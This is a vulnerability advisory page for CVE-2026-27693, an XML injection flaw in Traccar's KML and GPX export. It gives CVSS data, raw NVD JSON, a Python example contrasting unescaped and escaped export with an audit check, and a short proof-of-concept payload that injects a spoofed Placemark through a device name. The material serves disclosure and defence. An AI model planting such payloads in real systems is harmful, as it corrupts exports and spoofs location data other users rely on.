Security Vulnerability Report
CVE-2026-27693 CVSS 5.4 MEDIUM

CVE-2026-27693

Published: 2026-05-05 13:16:28
Last Modified: 2026-05-08 20:04:19

Description

Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0.
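The defect the description names is writing untrusted device names into XML as raw text. The following is an added example, not Traccar's code (Traccar is Java; this is Python standard library): a string-built KML export beside one built with ElementTree, whose serializer escapes text nodes, plus an `audit_export` check a defender can run over an exported file. The device name, coordinates, and helper names are constructed for illustration.

```python
# Added example (not Traccar's code): the export defect the advisory describes,
# and a hardened version, using only the Python standard library. The device
# name, sample coordinates and the audit helper are constructed for illustration.
import xml.etree.ElementTree as ET

KML_NS = "http://www.opengis.net/kml/2.2"

# Constructed sample input: a device name containing XML metacharacters.
SAMPLE_NAME = "Truck <7> & Trailer"
SAMPLE_POINTS = [(-122.0822, 37.4222), (-122.0850, 37.4250)]


def coords_text(points):
    """KML coordinate tuples are lon,lat,alt separated by whitespace."""
    return " ".join(f"{lon},{lat},0" for lon, lat in points)


def build_kml_unsafe(device_name, points):
    """String concatenation without escaping: the defect class in CVE-2026-27693.
    Any '<', '&' or '>' in the device name lands in the document as markup."""
    return (
        f'<kml xmlns="{KML_NS}"><Document>'
        f"<name>{device_name}</name>"
        f"<Placemark><name>{device_name}</name>"
        f"<LineString><coordinates>{coords_text(points)}</coordinates></LineString>"
        f"</Placemark></Document></kml>"
    )


def build_kml_safe(device_name, points):
    """Build the tree with ElementTree; the serializer escapes text nodes, so the
    device name can only ever be character data, never markup."""
    kml = ET.Element("kml", xmlns=KML_NS)
    doc = ET.SubElement(kml, "Document")
    ET.SubElement(doc, "name").text = device_name
    placemark = ET.SubElement(doc, "Placemark")
    ET.SubElement(placemark, "name").text = device_name
    line = ET.SubElement(placemark, "LineString")
    ET.SubElement(line, "coordinates").text = coords_text(points)
    return ET.tostring(kml, encoding="unicode")


def audit_export(kml_text):
    """Defender-side check on an export: is it well-formed XML, how many Placemark
    elements does it carry, and what names do they report? A parse error, or more
    placemarks than devices were exported, is a sign of injected content."""
    try:
        root = ET.fromstring(kml_text)
    except ET.ParseError:
        return {"well_formed": False, "placemarks": 0, "names": []}
    placemarks = root.findall(f".//{{{KML_NS}}}Placemark")
    names = [pm.findtext(f"{{{KML_NS}}}name") for pm in placemarks]
    return {"well_formed": True, "placemarks": len(placemarks), "names": names}


if __name__ == "__main__":
    # The unescaped build is not even well-formed once the name holds '<7>';
    # the escaped build parses and returns the name unchanged.
    print(audit_export(build_kml_unsafe(SAMPLE_NAME, SAMPLE_POINTS)))
    print(audit_export(build_kml_safe(SAMPLE_NAME, SAMPLE_POINTS)))
```

The invariant worth checking in a fixed build is that a device name round-trips through export and parse as character data only, and that the number of `Placemark` elements equals the number of devices exported; both hold for the ElementTree version and neither for the concatenated one.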

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* - VULNERABLE
Traccar 6.11.1
Traccar 6.12.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept: XML Injection via Device Name
# 1. Attacker creates a device with a malicious name containing XML tags.
# 2. Payload example to spoof location in KML:
malicious_name = "RealDevice</name><Placemark><name>Spoofed Location</name><Point><coordinates>-122.0822035425683,37.42228990140251,0</coordinates></Point><Placemark><name>"
# 3. When an admin exports the map (KML/GPX), the output XML will be corrupted:
# <Document>
#   <name>RealDevice</name>
#   <Placemark>... (Injected content) ...
#   <name>RealDevice</name>  <-- This might break the structure or render the fake point.
# </Document>
```

References

https://github.com/traccar/traccar/blob/v6.11.0/src/main/java/org/traccar/reports/GpxExportProvider.java#L52-L54 (Product)
https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656 (Exploit, Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27693", "sourceIdentifier": "[email protected]", "published": "2026-05-05T13:16:28.367", "lastModified": "2026-05-08T20:04:19.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11.1", "versionEndExcluding": "6.13.0", "matchCriteriaId": "A453268E-69E6-4CE2-A341-8890520DF28E"}]}]}], "references": [{"url": "https://github.com/traccar/traccar/blob/v6.11.0/src/main/java/org/traccar/reports/GpxExportProvider.java#L52-L54", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", 
"Mitigation"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}